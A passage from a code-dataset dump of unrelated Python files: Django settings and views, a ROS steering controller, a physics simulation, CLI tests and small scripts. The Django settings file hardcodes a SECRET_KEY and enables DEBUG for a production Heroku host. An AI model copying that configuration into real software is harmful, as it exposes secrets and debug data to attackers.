f.write(samples[i])\n\nprint('done.')\n","sub_path":"ps-lite/lr/data/gen_data.py","file_name":"gen_data.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"153572846","text":"import os\nimport dotenv\nimport dj_database_url\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nDOTENV = os.path.join(BASE_DIR, '.env')\nif os.path.isfile(DOTENV):\n dotenv.load_dotenv(DOTENV)\n\nSECRET_KEY = 'a%5cb20uhnfwol1ipk6$i$4*-a+#km1(-6#ri_gp9e1zvy6u*+'\n\nDEBUG = True\n\nALLOWED_HOSTS = [\n 'limelight-dance-core.herokuapp.com',\n]\n\nINSTALLED_APPS = [\n 'api',\n 'rest_framework',\n 'corsheaders',\n]\n\nMIDDLEWARE = [\n 'corsheaders.middleware.CorsMiddleware',\n]\n\nROOT_URLCONF = 'core.urls'\n\nWSGI_APPLICATION = 'core.wsgi.application'\n\nDATABASES = {}\nDATABASES['default'] = dj_database_url.config(conn_max_age=600)\n\nCORS_ORIGIN_WHITELIST = [\n 'https://limelight-dance-ui.herokuapp.com',\n 'http://limelight-dance-ui.herokuapp.com',\n 'http://localhost:8080',\n]\n","sub_path":"core/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"292951254","text":"a = {\n 1: 1,\n 2: 1,\n}\n\ndef fib(n):\n if n in a:\n return a[n]\n else:\n x = fib(n - 1) + fib(n - 2)\n a[n] = x\n return x\n\ndef main():\n n = int(input())\n print(fib(n))\n\nif __name__ == \"__main__\":\n main()","sub_path":"stepik-217/ch-2-ch-3/ch-2-2-step-6.py","file_name":"ch-2-2-step-6.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"401405117","text":"# assert r.json()['code'] == login_data['expect']['code']\n# assert r.json()['status'] == login_data['expect']['status']\n# assert r.json()['msg'] == login_data['expect']['msg']\nfrom pytest_check import check\n\n\ndef equal(real,expect,keys):\n ks = keys.split(',')\n for k in ks:\n r = str(real.get(k))\n e = str(expect.get(k))\n try:\n check.equal(r,e)\n print(f\"检验{k}成功\")\n except Exception as e:\n print(f\"检验{k}失败,失败信息为{e}\")","sub_path":"zonghe/caw/Check.py","file_name":"Check.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"649830156","text":"#!/usr/bin/env python\n\nimport os\nimport rospy\nimport numpy as np\nfrom nav_msgs.msg import Odometry\nfrom std_msgs.msg import Float32, Int16\nimport math\n\nfirst_run = True\n\nsteer_pub = None\nspeed_pub = None\nstart_stop_pub = None\ndir = os.path.dirname(os.path.abspath(__file__))\nlane1_matrix = np.load(os.path.join(dir, './matrixDynamic_lane1.npy'))\nlane2_matrix = np.load(os.path.join(dir, './matrixDynamic_lane2.npy'))\nmeter2res_factor = 10\n\nforward_speed = -150\nbackward_speed = 150\ncalibrated_forward_angle = 100\n\nkp = 6\nmax_steering_angle = np.pi / 4\n\nspeed = None\nspeed_change_threshold = 0.1\n\n\nlast_speed = None\nlast_steering = None\n\nackerman_angles = [45, 0, -45]\nsteering_angles = [0, 100, 179]\n# polynomial of 3rd degree to best map the steering angle\n# as explained in the lectures, autos tend to have a more precise steering near the straight ahead angle,\n# so more like\n#\n# *\n# *\n# *\n# *\n# *\n# * * *\n# *\n# *\n# *\n# * Well at least I tried ^^, note my awesome ASCII function drawing skills\nsteer_map_p = np.poly1d(np.polyfit(ackerman_angles, steering_angles, 3))\n\n\ndef get_calibrated_steering(angle):\n return steer_map_p(angle)\n\n\ndef get_orientation_angle(quaternion):\n return np.arccos(quaternion.w) * 2 * np.sign(quaternion.z)\n\n\ndef get_x_y_orientation(odom_msg):\n pose = odom_msg.pose.pose\n position = pose.position\n orientation = pose.orientation\n\n return position.x, position.y, get_orientation_angle(orientation)\n\n\ndef unpack_msg(odom_msg):\n return get_x_y_orientation(odom_msg)\n\n\ndef get_steering_speed_fxy_car_map(x, y, yaw):\n global speed\n # rospy.loginfo('x: {}; y: {}'.format(x, y))\n\n x_in_map = int(np.round(x * meter2res_factor))\n y_in_map = int(np.round(y * meter2res_factor))\n\n if x_in_map < 0:\n x_in_map = 0\n elif x_in_map >= lane1_matrix.shape[0]:\n x_in_map = lane1_matrix.shape[0] - 1\n\n if y_in_map < 0:\n y_in_map = 0\n elif y_in_map >= lane1_matrix.shape[1]:\n y_in_map = lane1_matrix.shape[1] - 1\n\n f_x_map, f_y_map = lane1_matrix[x_in_map, y_in_map, :]\n f_x_car = np.cos(yaw) * f_x_map + np.sin(yaw) * f_y_map\n f_y_car = - np.sin(yaw) * f_x_map + np.cos(yaw) * f_y_map\n\n if (speed is None and f_x_car >= 0) or f_x_car > speed_change_threshold:\n speed = forward_speed\n elif (speed is None and f_x_car < 0) or f_x_car < -speed_change_threshold:\n speed = backward_speed\n\n # formula from assignment, kp unchanged (for now)\n steering = kp * np.arctan(f_y_car / (2.5 * f_x_car))\n\n # the car can only steer max_steering_angle amount\n # so make sure we don't give any other commands\n if steering > max_steering_angle:\n steering = max_steering_angle\n elif steering < - max_steering_angle:\n steering = - max_steering_angle\n\n if speed == backward_speed:\n if f_y_car > 0:\n steering = -max_steering_angle\n if f_y_car < 0:\n steering = max_steering_angle\n\n # should get a mapping to the steering angle of the car\n # we used linear interpolation to map [-45, 45] to [0,179]\n # also added a point 0, 100 as the car we used was heading straight with a control angle of 100\n # note: if the function is using something else than 100, probably we changed the car at some point :D\n control_steering = get_calibrated_steering(np.degrees(steering))\n return control_steering, speed, f_x_car, f_y_car, f_x_map, f_y_map, steering\n\n\ndef get_steering_and_speed(x, y, yaw):\n return get_steering_speed_fxy_car_map(x, y, yaw)[:2]\n\n\ndef kalman_callback(odom_msg):\n global speed, first_run, last_speed, last_steering\n\n # rospy.loginfo('in callback')\n\n if first_run:\n first_run = False\n start_stop_pub.publish(0)\n else:\n pass\n\n # to plot circle\n # steer_pub.publish(last_steering)\n # speed_pub.publish(last_speed)\n # return\n\n x, y, yaw = unpack_msg(odom_msg)\n\n control_steering, speed = get_steering_and_speed(x, y, yaw)\n\n # need them to complete 1. exercise, driving in a circle\n # and keep publishing the first values\n last_speed = speed\n last_steering = control_steering\n\n steer_pub.publish(control_steering)\n speed_pub.publish(speed)\n\n # useful debugging logs\n # rospy.loginfo('controlling; speed: {}; angle: {}'.format(speed, control_steering))\n # rospy.loginfo('f_x: {}'.format(f_x_car))\n # rospy.loginfo('steering: {}'.format(control_steering))\n # rospy.loginfo('f_x: {}; f_y: {}'.format(f_x, f_y))\n\n\ndef init():\n global steer_pub, speed_pub, start_stop_pub\n\n rospy.init_node(\"path_controller\", anonymous=True)\n\n rospy.Subscriber('/assignment6/odom', Odometry, kalman_callback)\n steer_pub = rospy.Publisher('/manual_control/steering', Int16, queue_size=10)\n speed_pub = rospy.Publisher('/manual_control/speed', Int16, queue_size=10)\n start_stop_pub = rospy.Publisher('/manual_control/stop_start', Int16, queue_size=10)\n\n\nif __name__ == '__main__':\n try:\n init()\n rospy.spin()\n except rospy.ROSInterruptException:\n rospy.loginfo(\"interrupt\")\n","sub_path":"src/task10_path_following/scripts/path_controller.py","file_name":"path_controller.py","file_ext":"py","file_size_in_byte":5316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"405656956","text":"#!/usr/bin/env python2.6\nimport sys\nsys.stdout = sys.stderr\nfrom gnr.web.gnrwsgisite import GnrWsgiSite\nsite = GnrWsgiSite(__file__)\n\ndef application(environ,start_response):\n return site(environ,start_response)\n\nif __name__ == '__main__':\n from gnr.web.server import NewServer\n server=NewServer(__file__)\n server.run()","sub_path":"instances/learn/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"314705512","text":"from tkinter import *\n## 함수 선언부\ndef selectMemberData() :\n global inputEmail\n print(str(inputEmail.get()))\n## 전역 변수부\ninputEmail=\"\"\n\n## 메인코드부\ndef main(login) :\n window = Tk()\n\n window.geometry('400x400')\n\n text1 = Label(window, text=login)\n text1.pack()\n\n edtFrame = Frame(window);\n edtFrame.pack();\n\n inputEmail = Entry(edtFrame, width = 10); inputEmail.pack(padx=10, pady=10)\n btnInsert = Button(edtFrame, text=\"Login\",command=selectMemberData)\n btnInsert.pack(padx=10,pady=10)\n\n window.mainloop()\n","sub_path":"[5] 빅데이터 처리시스템 개발/pythonProject Ver10.12/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"71450381","text":"'''\nManage command for generating a list of test objects, e.g. to synchronize\nreal content from production to QA. Takes a text file as input with a\nlist of volume pids and outputs a list of all associated pids for those\nobjects - books, volumes, and pages (if any). Any non-volume or\nnon-existent objects will be skipped; use a higher verbosity level to\nsee details.\n\nSample usage::\n\n python manage.py find_test_pids vol_pids.txt --calculate-size > vol_assoc_pids.txt\n\n\n'''\nfrom collections import defaultdict\nimport time\n\nfrom django.template.defaultfilters import filesizeformat, pluralize\nfrom django.core.management.base import BaseCommand\nfrom eulfedora.server import Repository\n\nfrom readux.books.models import Volume\nfrom readux.fedora import ManagementRepository\n\n\nclass Command(BaseCommand):\n '''Generate a list of pids for testing purposes. Takes a text file\n as input with a list of Volume pids, one per line. Generates a list\n of all associated pids (books and pages), and can optionally\n calculate and report total approximate size of all objects listed.\n '''\n help = __doc__\n\n missing_args_message = 'Please specify input file with list of Volume pids'\n\n #: default verbosity level\n v_normal = 1\n\n def add_arguments(self, parser):\n # Positional argument for input file (required)\n parser.add_argument('input_file',\n help='Input file with a list of volume pids')\n # optional arguments\n parser.add_argument('--calculate-size',\n action='store_true',\n dest='calculate_size',\n default=False,\n help='Calculate total size of volumes and associated objects')\n\n def handle(self, *args, **options):\n # expects a plain text file with a list of pids,\n # one per line\n start = time.time()\n with open(options['input_file']) as infile:\n pids = [line.rstrip('\\n') for line in infile]\n\n # if size calculation is requested, we need credentials to access\n # datastream metadata\n if options['calculate_size']:\n repo = ManagementRepository()\n # otherwise, guest access should be sufficient\n else:\n repo = Repository()\n\n total_size = 0\n stats = defaultdict(int)\n book_pids = set()\n for pid in pids:\n vol = repo.get_object(pid, Volume)\n if not vol.exists:\n stats['skipped'] += 1\n if options['verbosity'] > self.v_normal:\n self.stderr.write('%s does not exist, skipping' % pid)\n continue\n if not vol.is_a_volume:\n stats['skipped'] += 1\n if options['verbosity'] > self.v_normal:\n self.stderr.write('%s does not appear to be a Volume, skipping' % pid)\n continue\n\n stats['volumes'] += 1\n # output volume pid & associated book/page pids\n if options['calculate_size']:\n for ds in vol.ds_list:\n dsobj = vol.getDatastreamObject(ds)\n for version in dsobj.history().versions:\n total_size += version.size\n\n\n self.stdout.write(vol.pid)\n # books are potentially repeatable\n # (could be associated with multiple volumes)\n # only output a book pid once\n if vol.book.pid not in book_pids:\n self.stdout.write(vol.book.pid)\n book_pids.add(vol.book.pid)\n\n if options['calculate_size']:\n total_size += self.get_object_size(vol)\n if vol.book.exists:\n total_size += self.get_object_size(vol.book)\n elif options['verbosity'] > self.v_normal:\n self.sdterr.write('Book %s associated with Volume %s does not exist' \\\n % (vol.book.pid, vol.pid))\n\n for page in vol.pages:\n stats['pages'] += 1\n self.stdout.write(page.pid)\n if options['calculate_size']:\n if page.exists:\n total_size += self.get_object_size(page)\n elif options['verbosity'] > self.v_normal:\n self.sdterr.write('Page %s associated with Volume %s does not exist' \\\n % (page.pid, vol.pid))\n\n # output summary after all pids are processed\n if options['verbosity'] >= self.v_normal:\n msg = 'Processed %d volume%s (skipped %d); found %d book%s and %d page%s in %.02fs.' % \\\n (stats['volumes'], pluralize(stats['volumes']),\n stats['skipped'],\n len(book_pids), pluralize(book_pids),\n stats['pages'], pluralize(stats['pages']),\n time.time() - start)\n\n # if calculate size was requested, report\n if options['calculate_size']:\n # approximate because it does not account for size of the foxml\n msg += ' Approximate total size is %s.' % filesizeformat(total_size)\n # Using stderr here so pid list can be output to a file\n self.stderr.write(msg)\n\n def get_object_size(self, obj):\n # calculate approximate size for a fedora object\n # given an eulfedora digital object,\n # total up the size for all versions of all datastreams\n size = 0\n for ds in obj.ds_list:\n dsobj = obj.getDatastreamObject(ds)\n for version in dsobj.history().versions:\n size += version.size\n return size\n","sub_path":"readux/books/management/commands/find_test_pids.py","file_name":"find_test_pids.py","file_ext":"py","file_size_in_byte":5629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"548461922","text":"import os;\n#from math import sqrt()\n\ndef media (lista):\n soma = 0\n for j in jam :\n soma += j\n media = soma/len(jam)\n return media #pode retornar dois elementos [x,y]\n\nos.system(\"cls\")\njam = []\n\nn = int(input(\"Quantos elementos serão lidos \"))\n\nfor j in range(0,n):\n element = float(input(\"Insira o numero \" + str(j) + \" \"))\n jam.insert(-1,element)\n\nprint(\"A media é \" + str(media(jam)))\n\n","sub_path":"4_Aula/Media.py","file_name":"Media.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"378969820","text":"from timeit import default_timer as timer\nimport numpy as np\nimport os\nimport Grid\nimport GaussianState\nimport PolaronHamiltonianGaussian\n\nimport sys\n\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nmatplotlib.rcParams.update({'font.size': 12, 'text.usetex': True})\n\n\n# ----------------------------------------\n# Grid Initialization\n# ----------------------------------------\nk_max = 10\nk_step = 0.1\n\ngrid_space = Grid.Grid(\"3D\")\ngrid_space.init1d('k', k_step, k_max, k_step)\n\n# ----------------------------------------\n# Initialization of the Gaussian state\n# ----------------------------------------\ngs = GaussianState.GaussianState(grid_space)\n\n# ----------------------------------------\n# Initialization PolaronHamiltonian\n# ----------------------------------------\n# this code is for infinime mass impurity\n# thus mI and P are not included in the list\n# of parameters\n\nmB = 1\nn0 = 1\ngBB = (4 * np.pi / mB) * 0.065\naIBi = 2.\n\nParams = [aIBi, mB, n0, gBB]\nham = PolaronHamiltonianGaussian.PolaronHamiltonianGaussian(gs, Params)\n\n# ----------------------------------------\n# Real Time evolution with Gaussian State\n# ----------------------------------------\ntMax = 20\ndt = 0.1\n\nstart = timer()\n\ntVec = np.arange(0, tMax, dt)\nNB_Vec = np.zeros(tVec.size, dtype=float)\nZfactor_Vec = np.zeros(tVec.size, dtype=float)\nenergy_vec = np.zeros(tVec.size, dtype=float)\n\nfor ind, t in enumerate(tVec):\n NB_Vec[ind] = gs.get_PhononNumber()\n Zfactor_Vec[ind] = gs.get_Zfactor()\n energy_vec[ind] = gs.get_energy(ham)\n\n gs.evolve_real_time(dt, ham)\n\n\nend = timer()\n\nprint(end - start)\n\n\n# ----------------------------------------\n# Save data\n# ----------------------------------------\ndata = [ham.Params, tVec, NB_Vec, Zfactor_Vec, energy_vec]\n\ndirpath = os.path.dirname(os.path.realpath(__file__))\nnp.save(dirpath + '/data/gsrt_aIBi:%.2f.npy' % (aIBi), data)\n\nprint(energy_vec[-1])\nprint(NB_Vec[-1])\nprint(Zfactor_Vec[-1])\n\n","sub_path":"gaussian_real_time.py","file_name":"gaussian_real_time.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"184431399","text":"import unittest\nimport subprocess\nimport sys\nimport re\nimport random\n\nclass NonZeroExit(Exception):\n pass\n\nclass RegexEqual(object):\n def __init__(self, r):\n self.re = re.compile(r)\n \n def __eq__(self, x):\n return bool(self.re.search(x))\n\nclass CommandsTest(unittest.TestCase):\n def setUp(self):\n # re-use if already created\n self.zone = '%d.example.com' % random.randint(0, sys.maxint)\n self._cmd('create', self.zone, '--comment', 'unittests')\n \n def tearDown(self):\n # clear up\n self._cmd('rrpurge', '--confirm', self.zone)\n self._cmd('delete', self.zone)\n \n def _cmd(self, cmd, *args):\n pargs = ('scripts/cli53', cmd) + args\n p = subprocess.Popen(pargs, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p.wait()\n if p.returncode:\n print >> sys.stderr, p.stderr.read()\n raise NonZeroExit\n return p.stdout.read()\n \n def test_rrcreate(self):\n self._cmd('rrcreate', self.zone, '', 'A', '10.0.0.1')\n self._cmd('rrcreate', self.zone, 'www', 'CNAME', self.zone+'.', '-x 3600')\n self._cmd('rrcreate', self.zone, 'info', 'TXT', 'this is a \"test\"')\n self._cmd('rrcreate', self.zone, 'weighttest1', 'CNAME', self.zone+'.', '-x 60', '-w 0', '-i awsweightzero')\n self._cmd('rrcreate', self.zone, 'weighttest2', 'CNAME', self.zone+'.', '-x 60', '-w 1', '-i awsweightone')\n self._cmd('rrcreate', self.zone, 'weighttest3', 'CNAME', self.zone+'.', '-x 60', '-w 50', '-i awsweightfifty')\n\n output = self._cmd('export', self.zone)\n output = [ x for x in output.split('\\n') if '10.0.0.1' in x or 'CNAME' in x or 'TXT' in x ]\n\n self.assertEqual(\n [\n \"@ 86400 IN A 10.0.0.1\",\n 'info 86400 IN TXT \"this is a \\\\\"test\\\\\"\"',\n \"weighttest1 60 AWS CNAME 0 %s. awsweightzero\" % self.zone,\n \"weighttest2 60 AWS CNAME 1 %s. awsweightone\" % self.zone,\n \"weighttest3 60 AWS CNAME 50 %s. awsweightfifty\" % self.zone,\n \"www 3600 IN CNAME %s.\" % self.zone,\n ],\n output\n )\n\n def test_rrdelete(self):\n self._cmd('rrcreate', self.zone, '', 'A', '10.0.0.1')\n self._cmd('rrdelete', self.zone, '', 'A')\n \n def test_rrcreate_replace_latency(self):\n self._cmd('rrcreate', '-i', 'asiacdn', '--region', 'ap-southeast-1', self.zone, 'cdn', 'CNAME', 'asiacdn.com.')\n self._cmd('rrcreate', '-i', 'statescdn', '--region', 'us-west-1', self.zone, 'cdn', 'CNAME', 'uscdn.com.')\n self._cmd('rrcreate', '-i', 'newuscdn', '--region', 'us-west-1', self.zone, 'cdn', 'CNAME', 'newuscdn.com.', '-r')\n","sub_path":"tests/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"300733471","text":"from datetime import date\nimport json\n\nfrom django.conf import settings\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse, reverse_lazy\nfrom django.db.models import Q\nfrom django.core.serializers import serialize\nfrom django.contrib.sitemaps import Sitemap\n\nfrom emplacement.models import Emplacement, EmplacementTenure\n\nfrom association.models import Association, AssociationTenure\n\nfrom composition.models import Composition\n\nfrom organization.forms import OrganizationBasicsForm, \\\n OrganizationCompositionForm, OrganizationPersonnelForm, \\\n OrganizationEmplacementForm, OrganizationAssociationForm, \\\n OrganizationCreateBasicsForm, OrganizationCreateCompositionForm, \\\n OrganizationCreatePersonnelForm, OrganizationCreateEmplacementForm, \\\n OrganizationCreateAssociationForm, OrganizationMembershipForm, \\\n OrganizationCreateMembershipForm\nfrom organization.models import Organization\n\nfrom location.models import Location\n\nfrom membershipperson.models import MembershipPerson\n\nfrom membershiporganization.models import MembershipOrganization\n\nfrom sfm_pc.templatetags.countries import country_name\nfrom sfm_pc.base_views import BaseUpdateView, BaseCreateView, BaseDetailView, \\\n BaseDeleteView, BaseDeleteRelationshipView\nfrom source.models import Source\n\n\nclass EditButtonsMixin:\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['is_{}_active'.format(self.button)] = True\n return context\n\n\nclass OrganizationDetail(BaseDetailView):\n model = Organization\n template_name = 'organization/view.html'\n slug_field = 'uuid'\n\n def get_sources(self, context):\n sources = set()\n\n sources.update(list(context['organization'].sources.values_list('uuid', flat=True)))\n\n related_entities = (\n 'person_members',\n 'org_members',\n 'memberships',\n 'subsidiaries',\n 'events',\n 'parents',\n )\n\n for relation in related_entities:\n for entity in context[relation]:\n sources.update(list(entity.sources.values_list('uuid', flat=True)))\n\n tenured_relations = (\n 'associations',\n 'emplacements',\n )\n\n seen_relationships = set()\n\n for relation in tenured_relations:\n for tenure in context[relation]:\n relationship = getattr(tenure, relation.rstrip('s'))\n\n if relationship.id in seen_relationships:\n continue\n\n sources.update(list(relationship.sources.values_list('uuid', flat=True)))\n seen_relationships.add(relationship.id)\n\n return Source.objects.filter(uuid__in=sources).order_by('source_url', '-accesspoint__accessed_on')\\\n .distinct('source_url')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n # Determine if the user is logged in\n authenticated = self.request.user.is_authenticated\n\n # Commanders of this unit\n context['person_members'] = []\n\n if authenticated:\n person_members = context['organization'].membershippersonorganization_set.all()\n else:\n person_members = context['organization'].membershippersonorganization_set.filter(object_ref__membershippersonmember__value__published=True)\n\n for membership in person_members:\n context['person_members'].append(membership.object_ref)\n\n # Organizational members of this unit\n context['org_members'] = []\n\n if authenticated:\n org_members = context['organization'].membershiporganizationorganization_set.all()\n else:\n org_members = context['organization'].membershiporganizationorganization_set.filter(value__published=True)\n\n if org_members:\n org_members = (mem.object_ref for mem in org_members)\n\n context['org_members'] = sorted(\n org_members,\n key=lambda x: (\n country_name(x.member.get_value().value.division_id.get_value().value),\n x.member.get_value().value.name.get_value().value\n )\n )\n\n # Other units that this unit is a member of\n context['memberships'] = []\n\n if authenticated:\n memberships = context['organization'].membershiporganizationmember_set.all()\n else:\n memberships = context['organization'].membershiporganizationmember_set.filter(object_ref__membershiporganizationorganization__value__published=True)\n\n if memberships:\n memberships = (mem.object_ref for mem in memberships)\n context['memberships'] = sorted(\n memberships,\n key=lambda x: (\n country_name(x.organization.get_value().value.division_id.get_value().value),\n x.organization.get_value().value.name.get_value().value\n )\n )\n\n # Child units\n context['subsidiaries'] = []\n\n if authenticated:\n children = context['organization'].child_organization.all()\n else:\n children = context['organization'].child_organization.filter(object_ref__compositionchild__value__published=True)\n\n for child in children:\n context['subsidiaries'].append(child.object_ref)\n\n # Incidents that this unit perpetrated\n context['events'] = []\n\n if authenticated:\n events = context['organization'].violationperpetratororganization_set.all()\n else:\n events = context['organization'].violationperpetratororganization_set.filter(object_ref__published=True)\n\n for event in events:\n context['events'].append(event.object_ref)\n\n context['emplacements'] = context['organization'].emplacements\n\n site_ids = context['emplacements'].values_list('emplacement__emplacementsite__value')\n\n context['sites'] = serialize(\n 'geojson',\n Location.objects.filter(id__in=site_ids),\n geometry_field='geometry'\n )\n\n context['associations'] = context['organization'].associations\n\n area_ids = context['associations'].values_list('association__associationarea__value')\n\n context['areas'] = serialize(\n 'geojson',\n Location.objects.filter(id__in=area_ids),\n geometry_field='geometry'\n )\n\n context['parents'] = []\n context['parents_list'] = []\n\n if authenticated:\n parents = context['organization'].parent_organization.all()\n else:\n parents = context['organization'].parent_organization.filter(object_ref__compositionparent__value__published=True)\n\n # \"parent\" is a CompositionChild\n for parent in parents:\n\n context['parents'].append(parent.object_ref.parent.get_value().value)\n\n org_data = {'when': '', 'url': ''}\n\n when = None\n if parent.object_ref.enddate.get_value():\n # Make the query using the raw date string, to accomodate\n # fuzzy dates\n when = repr(parent.object_ref.enddate.get_value().value)\n org_data['when'] = when\n\n # Display a formatted date\n org_data['display_date'] = str(parent.object_ref.enddate.get_value())\n\n kwargs = {'org_id': str(context['organization'].uuid)}\n ajax_route = 'command-chain'\n if when:\n kwargs['when'] = when\n ajax_route = 'command-chain-bounded'\n\n command_chain_url = reverse(ajax_route, kwargs=kwargs)\n\n org_data['url'] = command_chain_url\n\n context['parents_list'].append(org_data)\n\n context['sources'] = self.get_sources(context)\n\n return context\n\n\nclass OrganizationEditView(EditButtonsMixin, BaseUpdateView):\n model = Organization\n slug_field = 'uuid'\n slug_field_kwarg = 'organization_id'\n slug_url_kwarg = 'organization_id'\n context_object_name = 'organization'\n button = 'basics'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context['organization'] = self.get_reference_organization()\n\n return context\n\n def get_reference_organization(self):\n return Organization.objects.get(uuid=self.kwargs['organization_id'])\n\n def get_success_url(self):\n organization_id = self.kwargs['organization_id']\n\n # when saving and continuing, always return to the page we were on\n if self.request.POST.get('_continue'):\n return self.request.path\n else:\n return reverse('view-organization', kwargs={'slug': organization_id})\n\n def get_cancel_url(self):\n return reverse('view-organization', kwargs={'slug': self.kwargs['organization_id']})\n\n\nclass OrganizationCreateView(BaseCreateView):\n\n def get_success_url(self):\n organization_id = self.kwargs['organization_id']\n\n # when saving and continuing, redirect to the edit view for the new object\n if self.request.POST.get('_continue'):\n if not hasattr(self, 'edit_url_name'):\n return reverse('view-organization', args=[organization_id])\n else:\n return reverse(self.edit_url_name, kwargs={\n 'organization_id': organization_id,\n 'pk': self.object.pk\n })\n else:\n return reverse('view-organization', args=[organization_id])\n\n def get_cancel_url(self):\n return reverse('view-organization', kwargs={'slug': self.kwargs['organization_id']})\n\n\nclass OrganizationDeleteRelationshipView(BaseDeleteRelationshipView):\n\n def get_success_url(self):\n return reverse('create-organization-{}'.format(self.model.__name__.lower()),\n kwargs={'organization_id': self.kwargs['organization_id']})\n\n def get_cancel_url(self):\n organization_id = self.kwargs['organization_id']\n pk = self.kwargs['pk']\n return reverse('edit-organization-{}'.format(self.model.__name__.lower()),\n kwargs={'organization_id': organization_id,\n 'pk': pk})\n\n\nclass OrganizationDeleteView(BaseDeleteView):\n model = Organization\n slug_field = 'uuid'\n slug_field_kwarg = 'organization_id'\n slug_url_kwarg = 'organization_id'\n template_name = 'organization/delete.html'\n context_object_name = 'organization'\n\n def get_cancel_url(self):\n return reverse_lazy('edit-organization', args=[self.kwargs['organization_id']])\n\n def get_success_url(self):\n return reverse('search') + '?entity_type=Organization'\n\n def get_related_entities(self):\n return self.object.related_entities\n\n\nclass OrganizationEditBasicsView(OrganizationEditView):\n template_name = 'organization/edit-basics.html'\n form_class = OrganizationBasicsForm\n button = 'basics'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n def get_form_kwargs(self):\n form_kwargs = super().get_form_kwargs()\n form_kwargs['organization_id'] = self.kwargs['organization_id']\n return form_kwargs\n\n\nclass OrganizationCreateBasicsView(OrganizationCreateView):\n model = Organization\n slug_field = 'uuid'\n slug_field_kwarg = 'slug'\n context_object_name = 'organization'\n template_name = 'organization/create-basics.html'\n form_class = OrganizationCreateBasicsForm\n\n def get_success_url(self):\n \"\"\"\n OrganizationCreateBasicsView follows a different success_url pattern than\n the rest of the views that inherit from OrganizationCreateView, so\n override get_success_url().\n \"\"\"\n if self.request.POST.get('_continue'):\n return reverse('edit-organization', args=[self.object.uuid])\n else:\n return reverse('view-organization', args=[self.object.uuid])\n\n # When cancelling the creation of a new organization, take the \n # user back to the search page for organizations\n def get_cancel_url(self):\n return '{}?entity_type=Organization'.format(reverse('search'))\n\n\nclass OrganizationEditCompositionView(OrganizationEditView):\n template_name = 'organization/edit-composition.html'\n form_class = OrganizationCompositionForm\n model = Composition\n context_object_name = 'current_composition'\n slug_field_kwarg = 'pk'\n button = 'relationships'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n parents = Q(compositionparent__value=context['organization'])\n children = Q(compositionchild__value=context['organization'])\n\n context['compositions'] = Composition.objects.filter(parents | children)\n context['memberships'] = MembershipOrganization.objects.filter(membershiporganizationmember__value=context['organization'])\n\n return context\n\n\nclass OrganizationCreateCompositionView(EditButtonsMixin, OrganizationCreateView):\n template_name = 'organization/create-composition.html'\n form_class = OrganizationCreateCompositionForm\n model = Composition\n context_object_name = 'current_composition'\n slug_field_kwarg = 'pk'\n button = 'relationships'\n edit_url_name = 'edit-organization-composition'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['organization'] = Organization.objects.get(uuid=self.kwargs['organization_id'])\n\n parents = Q(compositionparent__value=context['organization'])\n children = Q(compositionchild__value=context['organization'])\n\n context['compositions'] = Composition.objects.filter(parents | children)\n context['memberships'] = MembershipOrganization.objects.filter(membershiporganizationmember__value=context['organization'])\n\n return context\n\n\nclass OrganizationDeleteCompositionView(OrganizationDeleteRelationshipView):\n model = Composition\n template_name = 'organization/delete-composition.html'\n\n\n def get_objects_to_update(self):\n composition = self.get_object()\n parent = composition.parent.get_value().value\n child = composition.child.get_value().value\n return parent, child\n\n def delete(self, request, *args, **kwargs):\n parent, child = self.get_objects_to_update()\n\n response = super().delete(request, *args, **kwargs)\n\n parent.object_ref_saved()\n child.object_ref_saved()\n\n return response\n\n\nclass OrganizationEditMembershipView(OrganizationEditView):\n template_name = 'organization/edit-membership.html'\n form_class = OrganizationMembershipForm\n model = MembershipOrganization\n context_object_name = 'current_membership'\n slug_field_kwarg = 'pk'\n button = 'relationships'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['organization'] = Organization.objects.get(uuid=self.kwargs['organization_id'])\n\n parents = Q(compositionparent__value=context['organization'])\n children = Q(compositionchild__value=context['organization'])\n\n context['compositions'] = Composition.objects.filter(parents | children)\n context['memberships'] = MembershipOrganization.objects.filter(membershiporganizationmember__value=context['organization'])\n\n return context\n\n def get_form_kwargs(self):\n form_kwargs = super().get_form_kwargs()\n form_kwargs['organization_id'] = self.kwargs['organization_id']\n return form_kwargs\n\n\nclass OrganizationCreateMembershipView(EditButtonsMixin, OrganizationCreateView):\n template_name = 'organization/create-membership.html'\n form_class = OrganizationCreateMembershipForm\n model = 